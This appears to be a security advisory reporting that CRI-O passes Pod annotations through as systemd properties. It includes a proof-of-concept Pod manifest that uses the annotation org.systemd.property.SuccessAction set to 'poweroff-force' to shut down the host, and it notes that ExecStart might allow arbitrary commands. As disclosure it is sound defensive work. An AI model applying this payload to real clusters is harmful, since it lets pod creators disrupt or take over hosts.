On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:
---
apiVersion: v1
kind: Pod
metadata:
name: poc-arbitrary-systemd-property-injection
annotations:
# I believe that ExecStart with an arbitrary command works here too,
# but I haven't figured out how to marshalize the ExecStart struct to gvariant string.
org.systemd.property.SuccessAction: "'poweroff-force'"
spec:
containers:
- name: hello
image: [quay.io/podman/hello](http://quay.io/podman/hello)
This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.
Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations
Impact
On CRI-O, it looks like an arbitrary systemd property can be injected via a Pod annotation:
This means that any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.
Tested with CRI-O v1.24 on minikube.
I didn't test the latest v1.29 because it is incompatible with minikube: kubernetes/minikube#18367
Thanks to Cédric Clerget (GitHub ID @cclerget) for finding out that CRI-O just passes pod annotations to OCI annotations:
opencontainers/runc#3923 (comment)
CRI-O has to filter out annotations that have the prefix "org.systemd.property."
See also:
Workarounds
Unfortunately, the only workarounds would involve an external mutating webhook to disallow these annotations
References